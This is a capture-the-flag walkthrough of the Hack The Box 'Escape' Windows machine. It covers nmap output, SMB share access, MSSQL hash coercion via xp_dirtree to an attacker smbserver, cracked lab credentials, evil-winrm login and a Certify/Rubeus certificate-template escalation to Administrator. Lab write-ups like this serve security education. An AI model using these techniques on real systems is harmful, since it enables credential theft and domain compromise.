In this post, I would like to share a walkthrough of the Escape Machine from Hack the Box


This room will be considered a medium machine on Hack the Box

What will you gain from the Escape machine?


For the user flag, you will need to manage to obtain the database credentials inside the PDF file. We should get an NTLMv2 hash by using SQL command via smbserver. As a result, we success to access the server by using evil-winrm. Next, we should get other credentials from the error log file.


As for the root flag, you only need to retrieve the administrator’s NTLM hash by using the tools such as Rubeus.exe and Certifiy.exe

Information Gathering on Escape Machine


Once we have started the VPN connection which requires a download from Hackthebox, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN

┌─[darknite@parrot]─[~/Document/htb/Escape]
└──╼ $nmap -sC -sV 10.10.11.202 -oA initial -Pn 
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-03 02:17 EST
Nmap scan report for 10.10.11.202
Host is up (0.22s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-03-03 15:18:21Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
|_ssl-date: 2023-03-03T15:19:45+00:00; +8h00m00s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-03-03T15:19:46+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: sequel
|   NetBIOS_Domain_Name: sequel
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: sequel.htb
|   DNS_Computer_Name: dc.sequel.htb
|   DNS_Tree_Name: sequel.htb
|_  Product_Version: 10.0.17763
|_ssl-date: 2023-03-03T15:19:45+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-03-03T13:51:43
|_Not valid after:  2053-03-03T13:51:43
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-03-03T15:19:45+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
|_ssl-date: 2023-03-03T15:19:46+00:00; +8h00m00s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 111.08 seconds

From the nmap result, I notice that there’s no HTTP or port 80 open on the machine

SMBclient enumeration


Let’s enumerate the SMB Shares on the machine and notice only the Public Sharename has caught my attention


Therefore, let’s access the Sharename by using the smbclient


However, we managed to find a PDF file that we can try to download the file on our attacker’s machine


Sadly, we cannot download normally because we got the error “NT_STATUS_NO_SUCH_FILE


As a result, we can add the symbol on the SQL Server Procedures.pdf and we managed to download it successfully


The two screenshots above show some useful information

Enumerate the server by running the impacket-mssqlclient and impacket-smbserver


From the information that we found earlier within the PDF by starting the mssqlclient with the command “impacket-mssqlclient WORKGROUP/PublicUser:GuestCantWrite1@10.10.11.202


Firstly, let’s start our smbserver by executing the command “sudo impacket-smbserver <anyname> . -smbsupport


As a result, we should execute the xp_dirtree ‘\\<yourIP\<yourfile>


At last, we managed to obtain the hashes that we can crack with John the Ripper


The hashes will be looking something as shown above.


Finally, the hashes managed to be cracked with the username and password

Accessing the Escape machine via evil-winrm


We should be able to access the machine via evil-winrm by entering the credentials that we found earlier such as username = sql_server and password = REGGIE1234ronnie


Nothing can be found within the Document directory

Graphical user interface

Description automatically generated

We managed to find an SQL Server on the main directory there’s some useful information hidden in that SQL Server directory


There’s a backup file such as ERORLOG.BAK resides within the Logs Directory


There should be something that we can use for the latter stage.

Text

Description automatically generated
Graphical user interface, text

Description automatically generated

After i analyze the logs carefully, i notice there is one credential that we can use to obtain access to the machine with a different username

Text

Description automatically generated

Finally, we can access the machine via a different credential

Text

Description automatically generated

We can read the user flag by using the “type user.txt” command

Escalate to Administrator Privileges Access


For this activity, we are required to have Certify.exe which can be downloaded here

Graphical user interface, text, chat or text message

Description automatically generated

We should upload the certify.exe into the victim’s machine

Text

Description automatically generated

To ensure the binary work, we can test by executing it


We should be able to find any vulnerability by using the certify.exe command


We can request the certificate and the private key where all the data that has been passing is requested by using the vulnerable template


Later, we can execute openssl command where the certificate will be saved as cert.pem which leads to exporting of the cert.pfx


As a result, we can upload the cert.pfx on the victim’s machine


Also, we are required to upload Rubeus.exe on the victim’s machine


We should be getting NTLM hashes by running the Rubeus command


Boom! At last, we managed to access the machine as Administrator user


We can read the root flag by typing the “type root.txt” command